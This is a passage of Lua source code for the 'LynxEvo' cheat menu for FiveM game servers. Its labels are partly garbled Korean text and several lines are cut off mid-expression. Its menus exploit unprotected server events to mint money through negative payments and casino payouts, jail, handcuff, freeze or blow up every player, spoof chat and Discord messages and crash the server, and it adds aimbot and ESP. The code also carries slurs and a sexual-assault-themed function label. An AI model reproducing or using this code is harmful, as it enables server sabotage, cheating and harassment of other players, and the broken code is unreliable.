  9606. elseif LynxEvo.Button('~g~~h~ESX ~y~Slot Machine') then
  9607. local m = KeyboardInput('Enter amount of money', '', 100)
  9608. if m ~= '' then
  9609. TriggerServerEvent('esx_slotmachine:sv:2', m)
  9610. end
  9611. elseif
  9612. LynxEvo.CheckBox(
  9613. '~g~~h~ESX Hunting~y~ reward',
  9614. huntspam,
  9615. function(dR)
  9616. huntspam = dR
  9617. end
  9618. )
  9619. then
  9620. end
  9621. LynxEvo.Display()
  9622. elseif LynxEvo.IsMenuOpened('ESXCustom') then
  9623. if LynxEvo.Button('~w~~h~Set hunger to ~h~~g~100') then
  9624. TriggerEvent('esx_status:set', 'hunger', 1000000)
  9625. elseif LynxEvo.Button('~w~~h~Set thirst to ~h~~g~100') then
  9626. TriggerEvent('esx_status:set', 'thirst', 1000000)
  9627. elseif LynxEvo.Button('~g~~h~ESX ~r~Revive') then
  9628. local f = KeyboardInput('Enter Player ID or all', '', 1000)
  9629. if f then
  9630. if f == 'all' then
  9631. for i = 0, 128 do
  9632. TriggerEvent('esx_ambulancejob:revive', GetPlayerServerId(i))
  9633. TriggerEvent('esx_ambulancejob:revive', GetPlayerServerId(i))
  9634. end
  9635. else
  9636. TriggerEvent('esx_ambulancejob:revive', f)
  9637. TriggerEvent('esx_ambulancejob:revive', f)
  9638. end
  9639. end
  9640. elseif LynxEvo.Button('~g~~h~ESX ~b~Handcuff') then
  9641. local f = KeyboardInput('Enter Player ID or all', '', 1000)
  9642. if f then
  9643. if f == 'all' then
  9644. for i = 0, 128 do
  9645. TriggerServerEvent('esx_policejob:handcuff', GetPlayerServerId(i))
  9646. TriggerEvent('esx_policejob:handcuff', GetPlayerServerId(i))
  9647. end
  9648. else
  9649. TriggerEvent('esx_policejob:handcuff', f)
  9650. TriggerServerEvent('esx_policejob:handcuff', f)
  9651. end
  9652. end
  9653. elseif LynxEvo.Button('~h~Get Driving License') then
  9654. TriggerServerEvent('esx_dmvschool:addLicense', 'dmv')
  9655. TriggerServerEvent('esx_dmvschool:addLicense', 'drive')
  9656. elseif LynxEvo.Button('~h~~b~Buy ~s~a vehicle for ~g~free') then
  9657. cv()
  9658. end
  9659. LynxEvo.Display()
  9660. elseif LynxEvo.IsMenuOpened('ESXDrugs') then
  9661. if LynxEvo.Button('~h~~g~Harvest ~g~Weed') then
  9662. hweed()
  9663. elseif LynxEvo.Button('~h~~g~Transform ~g~Weed') then
  9664. tweed()
  9665. elseif LynxEvo.Button('~h~~g~Sell ~g~Weed') then
  9666. sweed()
  9667. elseif LynxEvo.Button('~h~~w~Harvest ~w~Coke') then
  9668. hcoke()
  9669. elseif LynxEvo.Button('~h~~w~Transform ~w~Coke') then
  9670. tcoke()
  9671. elseif LynxEvo.Button('~h~~w~Sell ~w~Coke') then
  9672. scoke()
  9673. elseif LynxEvo.Button('~h~~r~Harvest Meth') then
  9674. hmeth()
  9675. elseif LynxEvo.Button('~h~~r~Transform Meth') then
  9676. tmeth()
  9677. elseif LynxEvo.Button('~h~~r~Sell Meth') then
  9678. smeth()
  9679. elseif LynxEvo.Button('~h~~p~Harvest Opium') then
  9680. hopi()
  9681. elseif LynxEvo.Button('~h~~p~Transform Opium') then
  9682. topi()
  9683. elseif LynxEvo.Button('~h~~p~Sell Opium') then
  9684. sopi()
  9685. elseif LynxEvo.Button('~h~~g~Money Wash') then
  9686. mataaspalarufe()
  9687. elseif LynxEvo.Button('~r~~h~Stop all') then
  9688. matanumaispalarufe()
  9689. elseif
  9690. LynxEvo.CheckBox(
  9691. '~h~~r~Blow Drugs Up ~y~DANGER!',
  9692. BlowDrugsUp,
  9693. function(dR)
  9694. BlowDrugsUp = dR
  9695. end
  9696. )
  9697. then
  9698. end
  9699. LynxEvo.Display()
  9700. elseif LynxEvo.IsMenuOpened('VRPTriggers') then
  9701. if LynxEvo.Button('~r~~h~VRP ~s~??~y~?뚰솚') then
  9702. local m = KeyboardInput('?앹꽦??湲덉븸 ?낅젰', '', 100)
  9703. if m ~= '' then
  9704. TriggerServerEvent(
  9705. 'lscustoms:payGarage',
  9706. {
  9707. costs = -m
  9708. }
  9709. )
  9710. end
  9711. elseif LynxEvo.Button('~r~~h~VRP ~s~?щ’癒몄떊 ~g~?곗듅癒몃땲') then
  9712. local m = KeyboardInput('Enter amount of money', '', 100)
  9713. if m ~= '' then
  9714. TriggerServerEvent('vrp_slotmachine:server:2', m)
  9715. end
  9716. elseif LynxEvo.Button('~r~~h~~g~?ロ???~p~蹂댁긽 ~s~諛쏄린') then
  9717. TriggerServerEvent('paycheck:autohottime')
  9718. TriggerServerEvent('paycheck:autohottime2')
  9719. TriggerServerEvent('paycheck:autohottime3')
  9720. TriggerServerEvent('paycheck:auto')
  9721. TriggerServerEvent('paycheck:auto2')
  9723. elseif LynxEvo.Button('~r~~h~~g~移댁???~p~移??앹꽦 ~y~by-?≫뙜??) then
  9724. local m = KeyboardInput('?앹꽦??移댁???移?媛?닔 ', '', 100)
  9725. if m ~= '' then
  9727. -- Too bad that require doesn't exist client-side
  9728. -- TOOLS DEF
  9729. Tools = {}
  9731. -- ID generator
  9733. local IDGenerator = {}
  9735. function Tools.newIDGenerator()
  9736. local r = setmetatable({}, { __index = IDGenerator })
  9737. r:construct()
  9738. return r
  9739. end
  9741. function IDGenerator:construct()
  9742. self:clear()
  9743. end
  9745. function IDGenerator:clear()
  9746. self.max = 0
  9747. self.ids = {}
  9748. end
  9750. -- return a new id
  9751. function IDGenerator:gen()
  9752. if #self.ids > 0 then
  9753. return table.remove(self.ids)
  9754. else
  9755. local r = self.max
  9756. self.max = self.max+1
  9757. return r
  9758. end
  9759. end
  9761. -- free a previously generated id
  9762. function IDGenerator:free(id)
  9763. table.insert(self.ids,id)
  9764. end
  9766. -- TUNNEL DEF
  9767. Tunnel = {}
  9769. local function tunnel_resolve(itable,key)
  9770. local mtable = getmetatable(itable)
  9771. local iname =
  9772. local ids = mtable.tunnel_ids
  9773. local callbacks = mtable.tunnel_callbacks
  9774. local identifier = mtable.identifier
  9776. -- generate access function
  9777. local fcall = function(args,callback)
  9778. if args == nil then
  9779. args = {}
  9780. end
  9782. -- send request
  9783. if type(callback) == "function" then -- ref callback if exists (become a request)
  9784. local rid = ids:gen()
  9785. callbacks[rid] = callback
  9786. TriggerServerEvent(iname..":tunnel_req",key,args,identifier,rid)
  9787. else -- regular trigger
  9788. TriggerServerEvent(iname..":tunnel_req",key,args,"",-1)
  9789. end
  9791. end
  9793. itable[key] = fcall -- add generated call to table (optimization)
  9794. return fcall
  9795. end
  9797. -- bind an interface (listen to net requests)
  9798. -- name: interface name
  9799. -- interface: table containing functions
  9800. function Tunnel.bindInterface(name,interface)
  9801. -- receive request
  9802. RegisterNetEvent(name..":tunnel_req")
  9803. AddEventHandler(name..":tunnel_req",function(member,args,identifier,rid)
  9804. local f = interface[member]
  9806. local delayed = false
  9808. local rets = {}
  9809. if type(f) == "function" then
  9810. -- bind the global function to delay the return values using the returned function with args
  9811. TUNNEL_DELAYED = function()
  9812. delayed = true
  9813. return function(rets)
  9814. rets = rets or {}
  9815. if rid >= 0 then
  9816. TriggerServerEvent(name..":"..identifier..":tunnel_res",rid,rets)
  9817. end
  9818. end
  9819. end
  9821. rets = {f(table.unpack(args))} -- call function
  9822. -- CancelEvent() -- cancel event doesn't seem to cancel the event for the other handlers, but if it does, uncomment this
  9823. end
  9825. -- send response (event if the function doesn't exist)
  9826. if not delayed and rid >= 0 then
  9827. TriggerServerEvent(name..":"..identifier..":tunnel_res",rid,rets)
  9828. end
  9829. end)
  9830. end
  9832. -- get a tunnel interface to send requests
  9833. -- name: interface name
  9834. -- identifier: unique string to identify this tunnel interface access (the name of the current resource should be fine)
  9835. function Tunnel.getInterface(name,identifier)
  9836. local ids = Tools.newIDGenerator()
  9837. local callbacks = {}
  9839. -- build interface
  9840. local r = setmetatable({},{ __index = tunnel_resolve, name = name, tunnel_ids = ids, tunnel_callbacks = callbacks, identifier = identifier })
  9842. -- receive response
  9843. RegisterNetEvent(name..":"..identifier..":tunnel_res")
  9844. AddEventHandler(name..":"..identifier..":tunnel_res",function(rid,args)
  9845. local callback = callbacks[rid]
  9846. if callback ~= nil then
  9847. -- free request id
  9848. ids:free(rid)
  9849. callbacks[rid] = nil
  9851. -- call
  9852. callback(table.unpack(args))
  9853. end
  9854. end)
  9856. return r
  9857. end
  9862. -- Proxy interface system, used to add/call functions between resources
  9863. Proxy = {}
  9865. local proxy_rdata = {}
  9866. local function proxy_callback(rvalues) -- save returned values, TriggerEvent is synchronous
  9867. proxy_rdata = rvalues
  9868. end
  9870. local function proxy_resolve(itable,key)
  9871. local iname = getmetatable(itable).name
  9873. -- generate access function
  9874. local fcall = function(args,callback)
  9875. if args == nil then
  9876. args = {}
  9877. end
  9879. TriggerEvent(iname..":proxy",key,args,proxy_callback)
  9880. return table.unpack(proxy_rdata) -- returns
  9881. end
  9883. itable[key] = fcall -- add generated call to table (optimization)
  9884. return fcall
  9885. end
  9887. --- Add event handler to call interface functions (can be called multiple times for the same interface name with different tables)
  9888. function Proxy.addInterface(name, itable)
  9889. AddEventHandler(name..":proxy",function(member,args,callback)
  9890. local f = itable[member]
  9892. if type(f) == "function" then
  9893. callback({f(table.unpack(args))}) -- call function with and return values through callback
  9894. -- CancelEvent() -- cancel event doesn't seem to cancel the event for the other handlers, but if it does, uncomment this
  9895. else
  9896. -- print("error: proxy call "":"..member.." not found")
  9897. end
  9898. end)
  9899. end
  9901. function Proxy.getInterface(name)
  9902. local r = setmetatable({},{ __index = proxy_resolve, name = name })
  9903. return r
  9904. end
  9908. vRPcasinoS = Tunnel.getInterface("vrp_FuckYou","vrp_FuckYou")
  9909. --[[vRPcasinoS = Tunnel.getInterface("vrp_casi!","vrp_casi!")
  9910. vRPcasinoS = Tunnel.getInterface("vRP_ca!","vRP_ca!")]]--
  9911. vRPcasinoS.payRouletteWinnings({m+1, m+1})
  9912. vRPcasinoS.winSlotMachine({m+1, m})
  9913. end
  9914. elseif LynxEvo.Button('~g~~h~??~r~吏€?곌린') then
  9915. TriggerServerEvent('cobrarMulta')
  9916. TriggerServerEvent('cobrarMulta')
  9917. TriggerServerEvent('cobrarMulta')
  9918. TriggerServerEvent('cobrarMulta')
  9919. TriggerServerEvent('cobrarMulta')
  9920. TriggerServerEvent('cobrarMulta')
  9921. TriggerServerEvent('cobrarMulta')
  9922. TriggerServerEvent('cobrarMulta')
  9923. TriggerServerEvent('cobrarMulta')
  9924. TriggerServerEvent('cobrarMulta')
  9925. TriggerServerEvent('cobrarMulta')
  9926. TriggerServerEvent('cobrarMulta')
  9927. TriggerServerEvent('cobrarMulta')
  9928. TriggerServerEvent('cobrarMulta')
  9929. TriggerServerEvent('cobrarMulta')
  9930. TriggerServerEvent('cobrarMulta')
  9931. TriggerServerEvent('cobrarMulta')
  9932. TriggerServerEvent('cobrarMulta')
  9933. TriggerServerEvent('cobrarMulta')
  9934. TriggerServerEvent('cobrarMulta')
  9935. TriggerServerEvent('cobrarMulta')
  9936. TriggerServerEvent('cobrarMulta')
  9937. TriggerServerEvent('cobrarMulta')
  9938. TriggerServerEvent('cobrarMulta')
  9939. TriggerServerEvent('cobrarMulta')
  9940. TriggerServerEvent('cobrarMulta')
  9941. TriggerServerEvent('cobrarMulta')
  9942. TriggerServerEvent('cobrarMulta')
  9943. TriggerServerEvent('cobrarMulta')
  9944. TriggerServerEvent('cobrarMulta')
  9945. TriggerServerEvent('cobrarMulta')
  9946. TriggerServerEvent('cobrarMulta')
  9947. TriggerServerEvent('cobrarMulta')
  9948. TriggerServerEvent('cobrarMulta')
  9949. TriggerServerEvent('cobrarMulta')
  9950. TriggerServerEvent('cobrarMulta')
  9951. TriggerServerEvent('cobrarMulta')
  9952. TriggerServerEvent('cobrarMulta')
  9953. TriggerServerEvent('cobrarMulta')
  9954. TriggerServerEvent('cobrarMulta')
  9955. TriggerServerEvent('cobrarMulta')
  9956. TriggerServerEvent('cobrarMulta')
  9957. TriggerServerEvent('cobrarMulta')
  9958. TriggerServerEvent('cobrarMulta')
  9959. TriggerServerEvent('cobrarMulta')
  9960. TriggerServerEvent('cobrarMulta')
  9961. TriggerServerEvent('cobrarMulta')
  9962. TriggerServerEvent('cobrarMulta')
  9964. elseif LynxEvo.Button('~g~~h~FUEL ~y~Legacy Fuel') then
  9965. local m = KeyboardInput('Enter amount of money', '', 100)
  9966. if m ~= '' then
  9967. TriggerServerEvent(
  9968. 'LegacyFuel:PayFuel',
  9969. {
  9970. costs = -m
  9971. }
  9972. )
  9973. end
  9974. elseif LynxEvo.Button('~r~~h~VRP ~s~Get driving license') then
  9975. TriggerServerEvent('dmv:success')
  9976. elseif LynxEvo.Button('~r~~h~VRP ~s~?€???낃툑') then
  9977. local m = KeyboardInput('Enter amount of money', '', 100)
  9978. if m ~= '' then
  9979. TriggerServerEvent('Banca:deposit', m)
  9980. TriggerServerEvent('bank:deposit', m)
  9981. end
  9982. elseif LynxEvo.Button('~r~~h~VRP ~s~?€???몄텧 ') then
  9983. local m = KeyboardInput('Enter amount of money', '', 100)
  9984. if m ~= '' then
  9985. TriggerServerEvent('bank:withdraw', m)
  9986. TriggerServerEvent('Banca:withdraw', m)
  9987. end
  9988. end
  9989. LynxEvo.Display()
  9990. elseif LynxEvo.IsMenuOpened('MiscTriggers') then
  9991. if LynxEvo.Button('~h~Send Discord Message') then
  9992. local et = KeyboardInput('Enter message to send', '', 100)
  9993. TriggerServerEvent('DiscordBot:playerDied', et, '1337')
  9994. av('The message:~n~' .. et .. '~n~Has been ~g~sent!', true)
  9995. elseif LynxEvo.Button('~h~Send Fake Message') then
  9996. local eu = KeyboardInput('Enter player name', '', 100)
  9997. if eu then
  9998. local db = KeyboardInput('Enter message', '', 1000)
  9999. if db then
  10000. TriggerServerEvent(
  10001. '_chat:messageEntered',
  10002. eu,
  10003. {
  10004. 0,
  10005. 0x99,
  10006. 255
  10007. },
  10008. db
  10009. )
  10010. end
  10011. end
  10012. elseif LynxEvo.Button('~h~~g~ESX ~y~CarThief ~s~TROLL') then
  10013. av('~y~esx_carthief ~g~required', true)
  10014. av('~g~Trying to send alerts', false)
  10015. carthieftroll()
  10016. end
  10017. LynxEvo.Display()
  10018. elseif LynxEvo.IsMenuOpened('怨좉툒紐⑤뱶') then
  10019. if LynxEvo.MenuButton('~h~~p~#~s~ ?뚮윭 硫붾돱', 'Destroyer') then
  10020. elseif LynxEvo.MenuButton('~h~~p~#~s~ ESP 硫붾돱', 'ESP硫붾돱') then
  10021. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?щ줈?ㅽ뿤??硫붾돱', 'CsMenu') then
  10022. elseif
  10023. LynxEvo.CheckBox(
  10024. '~h~?묒큺 ?먯엫遊?,
  10025. TriggerBot,
  10026. function(dR)
  10027. TriggerBot = dR
  10028. end
  10029. )
  10030. then
  10031. elseif
  10032. LynxEvo.CheckBox(
  10033. '~h~~r~AimBot Test (buggy)',
  10034. aimtest,
  10035. function(enabled)
  10036. aimtest = enabled
  10037. end
  10038. )
  10039. then
  10040. elseif
  10041. LynxEvo.CheckBox(
  10042. '~h~?뚮젅?댁뼱 ?꾩씠肄?,
  10043. dx,
  10044. function(dx)
  10045. end
  10046. )
  10047. then
  10048. cL = not cL
  10049. dx = cL
  10050. elseif
  10051. LynxEvo.CheckBox(
  10052. '~h~?뚮젅?댁뼱 ?대쫫 蹂댁씠湲?~g~v1',
  10053. cM,
  10054. function(dR)
  10055. cM = dR
  10056. cN = false
  10057. end
  10058. )
  10059. then
  10060. elseif
  10061. LynxEvo.CheckBox(
  10062. '~h~?뚮젅?댁뼱 ?대쫫/踰덊샇 蹂댁씠湲?~g~v2',
  10063. cN,
  10064. function(dR)
  10065. cN = dR
  10066. cM = false
  10067. end
  10068. )
  10069. then
  10070. elseif
  10071. LynxEvo.CheckBox(
  10072. '~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~?쇰━湲?,
  10073. freezeall,
  10074. function(dR)
  10075. freezeall = dR
  10076. end
  10077. )
  10078. then
  10079. elseif
  10080. LynxEvo.CheckBox(
  10081. '~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~??궗?쒗궎湲?,
  10082. blowall,
  10083. function(dR)
  10084. blowall = dR
  10085. end
  10086. )
  10087. then
  10088. elseif LynxEvo.Button('~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~?꾨쾭嫄?) then
  10089. for i = 0, 128 do
  10090. if IsPedInAnyVehicle(GetPlayerPed(i), true) then
  10091. local eb = 'xs_prop_hamburgher_wl'
  10092. local ec = GetHashKey(eb)
  10093. while not HasModelLoaded(ec) do
  10094. Citizen.Wait(0)
  10095. RequestModel(ec)
  10096. end
  10097. local ed = CreateObject(ec, 0, 0, 0, true, true, true)
  10098. AttachEntityToEntity(
  10099. ed,
  10100. GetVehiclePedIsIn(GetPlayerPed(i), false),
  10101. GetEntityBoneIndexByName(GetVehiclePedIsIn(GetPlayerPed(i), false), 'chassis'),
  10102. 0,
  10103. 0,
  10104. -1.0,
  10105. 0.0,
  10106. 0.0,
  10107. 0,
  10108. true,
  10109. true,
  10110. false,
  10111. true,
  10112. 1,
  10113. true
  10114. )
  10115. else
  10116. local eb = 'xs_prop_hamburgher_wl'
  10117. local ec = GetHashKey(eb)
  10118. while not HasModelLoaded(ec) do
  10119. Citizen.Wait(0)
  10120. RequestModel(ec)
  10121. end
  10122. local ed = CreateObject(ec, 0, 0, 0, true, true, true)
  10123. AttachEntityToEntity(
  10124. ed,
  10125. GetPlayerPed(i),
  10126. GetPedBoneIndex(GetPlayerPed(i), 0),
  10127. 0,
  10128. 0,
  10129. -1.0,
  10130. 0.0,
  10131. 0.0,
  10132. 0,
  10133. true,
  10134. true,
  10135. false,
  10136. true,
  10137. 1,
  10138. true
  10139. )
  10140. end
  10141. end
  10142. elseif LynxEvo.Button('~h~~o~Discord RPC~s~ 異붽?/?쒓굅') then
  10143. h = not h
  10144. if not h then
  10145. SetRichPresence(0)
  10146. SetDiscordAppId(0)
  10147. SetDiscordRichPresenceAsset(0)
  10148. SetDiscordRichPresenceAssetText(0)
  10149. else
  10150. e()
  10151. end
  10152. elseif
  10153. LynxEvo.CheckBox(
  10154. '~h~~r~Confirms~s~ masterswitch',
  10155. cO,
  10156. function(dR)
  10157. cO = dR
  10158. end
  10159. )
  10160. then
  10161. end
  10162. LynxEvo.Display()
  10163. elseif LynxEvo.IsMenuOpened('CsMenu') then
  10164. if
  10165. LynxEvo.CheckBox(
  10166. '~h~~y~湲곕낯 ~s~?щ줈?ㅽ뿤??,
  10167. crosshair,
  10168. function(dR)
  10169. crosshair = dR
  10170. crosshairc = false
  10171. crosshairc2 = false
  10172. end
  10173. )
  10174. then
  10175. elseif
  10176. LynxEvo.CheckBox(
  10177. '~h~~r~??옄 ~s~?щ줈?ㅽ뿤??,
  10178. crosshairc,
  10179. function(dR)
  10180. crosshair = false
  10181. crosshairc = dR
  10182. crosshairc2 = false
  10183. end
  10184. )
  10185. then
  10186. elseif
  10187. LynxEvo.CheckBox(
  10188. '~h~~r~?꾪듃 ~s~?щ줈?ㅽ뿤??,
  10189. crosshairc2,
  10190. function(dR)
  10191. crosshair = false
  10192. crosshairc = false
  10193. crosshairc2 = dR
  10194. end
  10195. )
  10196. then
  10197. end
  10198. LynxEvo.Display()
  10199. elseif LynxEvo.IsMenuOpened('Destroyer') then
  10200. if LynxEvo.Button('~h~~s~?쒕쾭 ~r~?뚮윭') then
  10201. nukeserver()
  10202. elseif
  10203. LynxEvo.CheckBox(
  10204. '~h~~r~Silent ~s~Server ~y~Crasher',
  10205. servercrasherxd,
  10206. function(dR)
  10207. servercrasherxd = dR
  10208. end
  10209. )
  10210. then
  10211. elseif LynxEvo.Button('~h~~g~ESX ~r~?뚮윭 ~b~v2') then
  10212. esxdestroyv2()
  10213. elseif LynxEvo.Button('~h~~g~ESX ~b~?붽툒 ~r~?뚮윭') then
  10214. EconomyDy2()
  10215. elseif LynxEvo.Button('~h~~r~VRP ~s~紐⑤뱺?뚮젅?댁뼱?먭쾶 ??二쇨린') then
  10216. vrpdestroy()
  10217. elseif LynxEvo.Button('~h~~g~ESX ~s~紐⑤뱺?뚮젅?댁뼱?먭쾶 ??二쇨린') then
  10218. giveeveryone()
  10219. elseif LynxEvo.Button('~h~~r~Jail~s~ All players') then
  10220. for i = 0, 128 do
  10221. TriggerServerEvent(
  10222. 'esx-qalle-jail:jailPlayer',
  10223. GetPlayerServerId(i),
  10224. 5000,
  10225. ''
  10226. )
  10227. TriggerServerEvent('esx_jailer:sendToJail', GetPlayerServerId(i), 45 * 60)
  10228. TriggerServerEvent('esx_jail:sendToJail', GetPlayerServerId(i), 45 * 60)
  10229. TriggerServerEvent('js:jailuser', GetPlayerServerId(i), 45 * 60, '- foriv#0001')
  10230. end
  10231. elseif LynxEvo.Button('~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~諛붾굹??~p~?뚰떚') then
  10232. bananapartyall()
  10233. elseif LynxEvo.Button('~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~媛뺢컙') then
  10234. RapeAllFunc()
  10235. elseif LynxEvo.Button('~h~~s~紐⑤뱺?뚮젅?댁뼱 ~r~媛€?먭린') then
  10236. for i = 0, 255 do
  10237. x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(i)))
  10238. roundx = tonumber(string.format('%.2f', x))
  10239. roundy = tonumber(string.format('%.2f', y))
  10240. roundz = tonumber(string.format('%.2f', z))
  10241. while not HasModelLoaded(GetHashKey('prop_fnclink_05crnr1')) do
  10242. Citizen.Wait(0)
  10243. RequestModel(GetHashKey('prop_fnclink_05crnr1'))
  10244. end
  10245. local e9 =
  10246. CreateObject(
  10247. GetHashKey('prop_fnclink_05crnr1'),
  10248. roundx - 1.70,
  10249. roundy - 1.70,
  10250. roundz - 1.0,
  10251. true,
  10252. true,
  10253. false
  10254. )
  10255. local ea =
  10256. CreateObject(
  10257. GetHashKey('prop_fnclink_05crnr1'),
  10258. roundx + 1.70,
  10259. roundy + 1.70,
  10260. roundz - 1.0,
  10261. true,
  10262. true,
  10263. false
  10264. )
  10265. SetEntityHeading(e9, -90.0)
  10266. SetEntityHeading(ea, 90.0)
  10267. FreezeEntityPosition(e9, true)
  10268. FreezeEntityPosition(ea, true)
  10269. end
  10270. end
  10271. LynxEvo.Display()
  10272. elseif LynxEvo.IsMenuOpened('crds') then
  10273. if LynxEvo.Button('~h~~p~#~s~ nit34byte~r~#~r~1337 ~p~DEV') then
  10274. av('~h~~o~Dont click me BAKA!~s~.', false)
  10275. av('Im a fag?', false)
  10276. av('I had to take the liberty to modify this', false)
  10277. elseif LynxEvo.Button('~h~~p~#~s~ DJSNAKE2~r~#~r~7983 ~p~DEV') then
  10278. elseif LynxEvo.Button('~h~~p~#~s~ JonBird~r~#~r~1337 ~p~DEV') then
  10279. end
  10280. LynxEvo.Display()
  10281. elseif LynxEvo.IsMenuOpened('WeaponTypes') then
  10282. for e0, ev in pairs(b7) do
  10283. if LynxEvo.MenuButton('~h~~p~#~s~ ' .. e0, 'WeaponTypeSelection') then
  10284. dy = ev
  10285. end
  10286. end
  10287. LynxEvo.Display()
  10288. elseif LynxEvo.IsMenuOpened('WeaponTypeSelection') then
  10289. for e0, ev in pairs(dy) do
  10290. if LynxEvo.MenuButton(, 'WeaponOptions') then
  10291. dz = ev
  10292. end
  10293. end
  10294. LynxEvo.Display()
  10295. elseif LynxEvo.IsMenuOpened('WeaponOptions') then
  10296. if LynxEvo.Button('~h~~r~臾닿린 ?뚰솚') then
  10297. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey(, 1000, false)
  10298. end
  10299. if LynxEvo.Button('~h~~g~珥앹븣?ъ깮') then
  10300. SetPedAmmo(GetPlayerPed(-1), GetHashKey(, 5000)
  10301. end
  10302. if
  10303. LynxEvo.CheckBox(
  10304. '~h~~r~臾댄븳 ~s~珥앹븣',
  10305. dz.bInfAmmo,
  10306. function(ew)
  10307. end
  10308. )
  10309. then
  10310. dz.bInfAmmo = not dz.bInfAmmo
  10311. SetPedInfiniteAmmo(GetPlayerPed(-1), dz.bInfAmmo, GetHashKey(
  10312. SetPedInfiniteAmmoClip(GetPlayerPed(-1), true)
  10313. PedSkipNextReloading(GetPlayerPed(-1))
  10314. SetPedShootRate(GetPlayerPed(-1), 1000)
  10315. end
  10316. for e0, ev in pairs(dz.mods) do
  10317. if LynxEvo.MenuButton('~h~~p~#~s~ ~h~~r~> ~s~' .. e0, 'ModSelect') then
  10318. dA = ev
  10319. end
  10320. end
  10321. LynxEvo.Display()
  10322. elseif LynxEvo.IsMenuOpened('ModSelect') then
  10323. for _, ev in pairs(dA) do
  10324. if LynxEvo.Button( then
  10325. GiveWeaponComponentToPed(GetPlayerPed(-1), GetHashKey(, GetHashKey(
  10326. end
  10327. end
  10328. LynxEvo.Display()
  10329. elseif LynxEvo.IsMenuOpened('CarTypes') then
  10330. for i, ex in ipairs(b3) do
  10331. if LynxEvo.MenuButton('~h~~p~#~s~ ' .. ex, 'CarTypeSelection') then
  10332. carTypeIdx = i
  10333. end
  10334. end
  10335. LynxEvo.Display()
  10336. elseif LynxEvo.IsMenuOpened('CarTypeSelection') then
  10337. for i, ex in ipairs(b4[carTypeIdx]) do
  10338. if LynxEvo.MenuButton('~h~~p~#~s~ ~h~~r~>~s~ ' .. ex, 'CarOptions') then
  10339. carToSpawn = i
  10340. end
  10341. end
  10342. LynxEvo.Display()
  10343. elseif LynxEvo.IsMenuOpened('CarOptions') then
  10344. if LynxEvo.Button('~h~~r~Spawn Car') then
  10345. local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
  10346. local veh = b4[carTypeIdx][carToSpawn]
  10347. if veh == nil then
  10348. veh = 'adder'
  10349. end
  10350. vehiclehash = GetHashKey(veh)
  10351. RequestModel(vehiclehash)
  10352. Citizen.CreateThread(
  10353. function()
  10354. local ey = 0
  10355. while not HasModelLoaded(vehiclehash) do
  10356. ey = ey + 100
  10357. Citizen.Wait(100)
  10358. if ey > 5000 then
  10359. ShowNotification('~h~~r~Cannot spawn this vehicle.')
  10360. break
  10361. end
  10362. end
  10363. SpawnedCar =
  10364. CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
  10365. SetVehicleStrong(SpawnedCar, true)
  10366. SetVehicleEngineOn(SpawnedCar, true, true, false)
  10367. SetVehicleEngineCanDegrade(SpawnedCar, false)
  10368. end
  10369. )
  10370. end
  10371. LynxEvo.Display()
  10372. elseif LynxEvo.IsMenuOpened('MainTrailer') then
  10373. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  10374. for i, ex in ipairs(b5) do
  10375. if LynxEvo.MenuButton('~h~~p~#~s~ ~h~~r~>~s~ ' .. ex, 'MainTrailerSpa') then
  10376. TrailerToSpawn = i
  10377. end
  10378. end
  10379. else
  10380. av('~h~~w~Not in a vehicle', true)
  10381. end
  10382. LynxEvo.Display()
  10383. elseif LynxEvo.IsMenuOpened('MainTrailerSpa') then
  10384. if LynxEvo.Button('~h~~r~Spawn Car') then
  10385. local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
  10386. local veh = b5[TrailerToSpawn]
  10387. if veh == nil then
  10388. veh = 'adder'
  10389. end
  10390. vehiclehash = GetHashKey(veh)
  10391. RequestModel(vehiclehash)
  10392. Citizen.CreateThread(
  10393. function()
  10394. local ey = 0
  10395. while not HasModelLoaded(vehiclehash) do
  10396. ey = ey + 100
  10397. Citizen.Wait(100)
  10398. if ey > 5000 then
  10399. ShowNotification('~h~~r~Cannot spawn this vehicle.')
  10400. break
  10401. end
  10402. end
  10403. local SpawnedCar =
  10404. CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
  10405. local ez = GetVehiclePedIsUsing(GetPlayerPed(-1))
  10406. AttachVehicleToTrailer(Usercar, SpawnedCar, 50.0)
  10407. SetVehicleStrong(SpawnedCar, true)
  10408. SetVehicleEngineOn(SpawnedCar, true, true, false)
  10409. SetVehicleEngineCanDegrade(SpawnedCar, false)
  10410. end
  10411. )
  10412. end
  10413. LynxEvo.Display()
  10414. elseif LynxEvo.IsMenuOpened('GiveSingleWeaponPlayer') then
  10415. for i = 1, #b6 do
  10416. if LynxEvo.Button(b6[i]) then
  10417. GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(b6[i]), 1000, false, true)
  10418. end
  10419. end
  10420. LynxEvo.Display()
  10421. elseif LynxEvo.IsMenuOpened('ESP硫붾돱') then
  10422. if
  10423. LynxEvo.CheckBox(
  10424. '~h~~r~ESP ~s~',
  10425. esp,
  10426. function(dR)
  10427. esp = dR
  10428. end
  10429. )
  10430. then
  10431. elseif
  10432. LynxEvo.CheckBox(
  10433. '~h~~r~ESP ~s~3D 諛뺤뒪',
  10434. espbox,
  10435. function(dR)
  10436. espbox = dR
  10437. end
  10438. )
  10439. then
  10440. elseif
  10441. LynxEvo.CheckBox(
  10442. '~h~~r~ESP ~s~?뺣낫',
  10443. espinfo,
  10444. function(dR)
  10445. espinfo = dR
  10446. end
  10447. )
  10448. then
  10449. elseif
  10450. LynxEvo.CheckBox(
  10451. '~h~~r~ESP ~s~?쇱씤',
  10452. esplines,
  10453. function(dR)
  10454. esplines = dR
  10455. end
  10456. )
  10457. then
  10458. end
  10459. LynxEvo.Display()
  10460. elseif LynxEvo.IsMenuOpened('濡쒖뒪?고넗??) then
  10461. local veh = GetVehiclePedIsUsing(PlayerPedId())
